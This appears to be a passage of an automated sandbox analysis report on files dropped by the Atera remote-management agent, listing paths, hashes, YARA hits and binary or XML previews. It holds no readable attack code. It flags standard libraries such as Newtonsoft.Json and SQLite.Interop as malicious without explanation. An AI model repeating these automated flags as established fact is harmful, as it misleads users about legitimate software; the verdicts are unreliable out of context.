                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59944
                                                                                                                                                                                                                                        Entropy (8bit):6.132505617622881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:56O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezGREpYi60B:56O4JuxnT+UuLMcBClyrvGGa76w
                                                                                                                                                                                                                                        MD5:80D52CC0CA6E0A24C65C0EC6E1D04245
                                                                                                                                                                                                                                        SHA1:1A364154797C2F233111CA4E431CD5F169BCC5C6
                                                                                                                                                                                                                                        SHA-256:A6CD8C4F007327C2B3E5E9772C086139FE7C0208BB17FDFC63B78FC7C639DF77
                                                                                                                                                                                                                                        SHA-512:16E0E7013DA0059137C4CF0436694EBEB98377F1870E976A108DD22F37B6C73033C38722103DBD97F0AC12DA99E31D51B7114B9F7E70FA56F11A1F29B6EC40A5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... .......s....`.................................m...O.......................((..............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........X..0.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..s....}.....s....}.....(......o8...(...+}....*..0...........{....o.....8......(.....s.......}E.....u....}D....{D...,........s....(....&+ms.......}G.....u....}F....{F...,........s....(....&+8s.........}I......u....}H.....{H...,.........s....(....&..(....:J.............o.....*.................0..I........{....o.....{....o.....+...(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1191
                                                                                                                                                                                                                                        Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                        MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                        SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                        SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                        SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23080
                                                                                                                                                                                                                                        Entropy (8bit):6.500983361117223
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ALOGTOwM15TRwLm6or29Nyb8E9VF6IYijSJIVxyyNllq:AnMTR0Pa25EpYi60tlq
                                                                                                                                                                                                                                        MD5:677BF5CBCE3B4A8E2B35714DB3EC89D4
                                                                                                                                                                                                                                        SHA1:6317DA7E6DC45CDCE30BCC1AE8FA9DF391B954BB
                                                                                                                                                                                                                                        SHA-256:E10B0E751A752F746305959D765E649BD49B73670BECE4DA5C9ACA549B2E8A08
                                                                                                                                                                                                                                        SHA-512:A80A740E0F314F8A44B6698BDD0465C511140796BEE87990695C61F88A45C5A4290B141D1606447D539E7F18784972AC787B73679AE68A79E46C056FA0C78FBD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.\.........." ..0..(...........G... ...`....... ...............................S....`..................................F..O....`..L............2..((...........E............................................... ............... ..H............text...4'... ...(.................. ..`.rsrc...L....`.......*..............@..@.reloc...............0..............@..B.................G......H........)..$............................................................~....*.......**...(.....*...0...........~.....o......,..~.....o......+i.s(...%.o.....%.o.....%.o.....%.o.....%.o....o ....%.o....o"....%.o....o$....%.o....o&.....~......o........+..*..0............(.......o....o.......o%...o................o!......(....}.......o!......(....}.......o!......(.....o#.......(....X}.......o!......(.....o#.......(....X}..............s..........%..o.....#....%........o ...&*...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1817640
                                                                                                                                                                                                                                        Entropy (8bit):6.551345291101956
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:B9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP4:B9Nzm31PMo4
                                                                                                                                                                                                                                        MD5:1CDFFBCDDE48DD0DF288177F4A36E201
                                                                                                                                                                                                                                        SHA1:70F1740086944DC3551401C54834746BC88B4FB3
                                                                                                                                                                                                                                        SHA-256:FBC738BCA1208ECB4FE086F0C100B746644375BC838CF925DE0AADCB9A0DAEEE
                                                                                                                                                                                                                                        SHA-512:D3903FA3A98F8DDD34C39C9A091285E343AB8FD961EEF130926E2B4E165398263D45D7127DB6E6450560F3CB91A239A39DACB4B8DB2787762E17666DB7AF1B2D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." .................................................................P....`.................................................P...x................!......((...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1436200
                                                                                                                                                                                                                                        Entropy (8bit):6.781311333719278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Ls5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEsZ:WlI+vIjE7mjOuKa8Riy+gvhaIn2+0+
                                                                                                                                                                                                                                        MD5:F31A6B9883F1835F9FB5CB9FB3B877E4
                                                                                                                                                                                                                                        SHA1:2C1DCF590151D9EEE2E34C78C9A9D6AE1517C3C1
                                                                                                                                                                                                                                        SHA-256:B06ABD1357A5D0111C380520A29E93D648632F240090756C61FE9BE9B518B02D
                                                                                                                                                                                                                                        SHA-512:171F9DC37C29508AF911764530286B2AA19731820F0C39B34F063B0E4C4EF16B501763BD32BA2C126CCEF88F89E3140D26A73B67C54AF1036E14049D95CC94F0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..{2..(2..(2..(.*W(...(.*U(...(.*T(...(..)%..(..)'..(..)=..(.Im(:..(,.5(1..(2..(...(..)3..(..)3..(..Y(3..(..)3..(Rich2..(........PE..L.....d...........!.....f...X............................................................@.........................P...t.......x....`..................((...p..X...@...p...............................@...............H............................text....d.......f.................. ..`.rdata..............j..............@..@.data....8.......,..................@....gfids.......P.......&..............@..@.rsrc........`.......(..............@..@.reloc..X....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):584433
                                                                                                                                                                                                                                        Entropy (8bit):7.9996007806235445
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:AaPKah+cOqB7YBiq57hmRYB2Vb7mde3FV/ruWIwUhA2yaJ4Gi1Cx/cL:xiBiqIYQF7/7ruQWA2Xxi1wS
                                                                                                                                                                                                                                        MD5:B50834694383960830CF48D9836E1108
                                                                                                                                                                                                                                        SHA1:ADC80813181B98A8296BEFA2960A55F939F3BFEE
                                                                                                                                                                                                                                        SHA-256:370A259808052366888284B0CC4C91FF8F23E8008003959B8D0EFB1ADBF00CD6
                                                                                                                                                                                                                                        SHA-512:F87BE933E87275B000BE031AA5DF7536DFD5FE9B99A607CE0904F206E074D3A0687A00654B9B78EDAA2FCCF3D30526E0EE5BD7DCBA4A5DAAFD6FC60EEAAA15C5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......FgY...........5...AgentPackageUpgradeAgent/AgentPackageUpgradeAgent.exe....(.......ch......75d..........z..L.....5...*...S.'.?...h.6..Eo....."y......5...z_...y..&....L..ZZ6.....=U...f...JYj......../..~.%......1,=....,.J....eG.=.i..G..I ..6m~.GO...............E,._&;>o.........{....@..Z.S......]....HS..TW...b...#Rh..H...p.|.A_..Q..NZ4`3a.....DE[.!.7.!.......@..]..ja..P.)..C...!g..UUG.........../..uW.&...!g..G.kv.z]C.-..p.....J..j.1".M..Wt.-x_.....&.g.k....Dc.}$".M....=..:......X?..i.peV..'.."-....e)0..'..D....v...1..1..g..X[...`....y....a...R...BE..:!.%{...v.:.K.#h.u..W..L.l..:.M..DXd.&.}......$.........:....D|t3......Q...&.".3>.@.....H.^.@..2. ..../.Y.............np....G.GU\......6.]i(.E).Z?yj..?V.Q.Q2.. ..q .Z4HN...W......G_.E*v3 ...A...4.....r...z..r..3~..i^..Qvj.:O*:.....+...>s&H.d..sF....V.8.~.'*......6..i......<....ol.($....8.E..s.....6...]WF!]P.I...\/..$....Q.4...r.b4S.Z.$..h....Y..5....v..n.2.K.w......(..?.UH..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57896
                                                                                                                                                                                                                                        Entropy (8bit):5.807323990997079
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rNvSjQvTQYc1IY1OwcujXQft0k5df9bq76In:rRSjQvMYcSIJcuMftH5d1bqL
                                                                                                                                                                                                                                        MD5:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                        SHA1:293CAE66CEDBC7385CD49819587D3D5A61629422
                                                                                                                                                                                                                                        SHA-256:0568E0D210DE9B344F9CE278291ACB32106D8425BDD467998502C1A56AC92443
                                                                                                                                                                                                                                        SHA-512:1A3C15E18557A14F0DF067478F683E8B527469126792FAE7B78361DAD29317FF7B9D307B5A35E303487E2479D34830AA7E894F2906EFFF046436428ADA9A4534
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g.........."...0.................. ........@.. ....................... ...........`.................................<...O.......x...............((........................................................... ............... ..H............text........ ...................... ..`.rsrc...x...........................@..@.reloc..............................@..B................p.......H........X...s...........................................................0..Y........o.......+C......o......r...p.o....t)...r...p(....,.........,..o.......&....X....i2..*..*...........$;..........8G.......0..#.......~....r/..po.......(....}.....{....(....,.rw..ps....z..{....o......r...p.o.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.....r...po.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.......,..o.........5.,..o......,..o......,..o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):535
                                                                                                                                                                                                                                        Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                        SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                        SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                        SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXSnn:WBe
                                                                                                                                                                                                                                        MD5:39DF0BC698F203A4FEF18A68A7B0EADC
                                                                                                                                                                                                                                        SHA1:0EA8D556AF659E0C8D6406B5B3E7E56EE6A10188
                                                                                                                                                                                                                                        SHA-256:F8DD3CEC3612C302B45EA9539002625E58E528A5CB68B4B0E6C3C2A378122C1A
                                                                                                                                                                                                                                        SHA-512:E6FF51381293BFD52EAE39B9868968A76D94BC993BAD5566C532A30E5EE5FE121C2F5B8EAED7ACEE59E3F6B8C1B3BEBB53B07B46F572F3498B1800B0DEAC128D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=27.6

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96808
                                                                                                                                                                                                                                        Entropy (8bit):6.179305078416296
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:nJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762y9:nQUm2H5KTfOLgxFJjE50vksVUfPvO1c9
                                                                                                                                                                                                                                        MD5:BE16D0F73D33053C3817894C955BFA43
                                                                                                                                                                                                                                        SHA1:6B79C7034EE0E4DBC4B90ADC3B47BF395CAE052D
                                                                                                                                                                                                                                        SHA-256:434EA180FF3960ADF251CF34B8333A1BD70EAA7BDF42279317F2ECD7B7CCEAEB
                                                                                                                                                                                                                                        SHA-512:6F08EC35E1D194328CD923FC22C6BBAFB072497ABA03DAC59F8E78C99D2CC3C87237CC5178CFEBA52078AC729286B8221FD7A8CD676A5A49D2879C553DAB332A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):186408
                                                                                                                                                                                                                                        Entropy (8bit):5.933461189028906
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:mkfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFxYV:g+c7b1W4R6joxfQ8Y
                                                                                                                                                                                                                                        MD5:7989DFD7A0AF54F59AD5C3E483A66CF6
                                                                                                                                                                                                                                        SHA1:4F323F2E5174A789A31068DD76355447DB61AFFB
                                                                                                                                                                                                                                        SHA-256:0E47E3F0432060BAE79988A622AAB4334328F85FE443D764D4C81D94C9F3DBAE
                                                                                                                                                                                                                                        SHA-512:757182DF2492B66E06AA3B1854DAB487BB512FC5FBCE869CA4265218F5889D2D5B3748C2FC5B458FA148D10F3F5B61028DCA9B789F6766689BA1A24E9BE06936
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..Z.........." ..0...... ......~.... ........... ..............................,Q....@.................................,...O.......................((........................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331816
                                                                                                                                                                                                                                        Entropy (8bit):6.168523582236471
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ZBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTk:ZDMUWITZznu85k8Wdn8KmCjIFi3VvY
                                                                                                                                                                                                                                        MD5:41E6FC15337B1F2F556E3DE56D0DB476
                                                                                                                                                                                                                                        SHA1:EF8EAAC6EF9B00383B48762773A5110D7C2F3EEA
                                                                                                                                                                                                                                        SHA-256:81D43F8C0726143F28A33390B78E540C75F48733C3518B9D605C2E52AC0554C4
                                                                                                                                                                                                                                        SHA-512:56956F6BBB56BF481B1434ADC0D37303065206FC4ECA8787B6EC8CD089D7C619875C62BBD282F5F0D9A69820937651968CC343CF5AE251B08345997BDD0555C7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@......f.....@.....................................O.......................((... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.960700401761297
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:NBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUD:NBjk38WuBcAbwoA/BkjSHXP36RMG+
                                                                                                                                                                                                                                        MD5:2CFBB3EA34E3EAEFB478A1C0BF00190D
                                                                                                                                                                                                                                        SHA1:A9298FD5C46D97C296E06B9D9D4034C2EC657D57
                                                                                                                                                                                                                                        SHA-256:34FFBC77AEA4058D6B4EF621815B5C56EDD35585888FBCC2DE10E7B176EE3A3A
                                                                                                                                                                                                                                        SHA-512:DA46D62BB6466E9B8DF21E75C594C06CBF3D79C8FE6038469B74F6562CCA9B38A482F386034F7B3C0D9DEEA6C5D0420AFE0EA08E59B1BBDA1C07B866D9F0B352
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... .......r....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55848
                                                                                                                                                                                                                                        Entropy (8bit):6.238377987704794
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:SREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpxDEpYi60WLS:SR8+5k15z0WBZEtgwJx876FG
                                                                                                                                                                                                                                        MD5:2FB2CD6CC7C0B40202165C2ACF27F3FC
                                                                                                                                                                                                                                        SHA1:D3125C28C46AD0083EA1EB65EAE6FA077908D985
                                                                                                                                                                                                                                        SHA-256:4E83AE51D18FABA26E8B1315C199AF46DF7A1AFB18390DB30337679DF54A7812
                                                                                                                                                                                                                                        SHA-512:C84CB5DE47798E6F0459BE87BCBA514FC14531F361909A2B81CFD6B477206B75C9F0F338C1477BF9A87BB7D08ACFEB99342EC5C9F1535F510BE742A27B5ED099
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
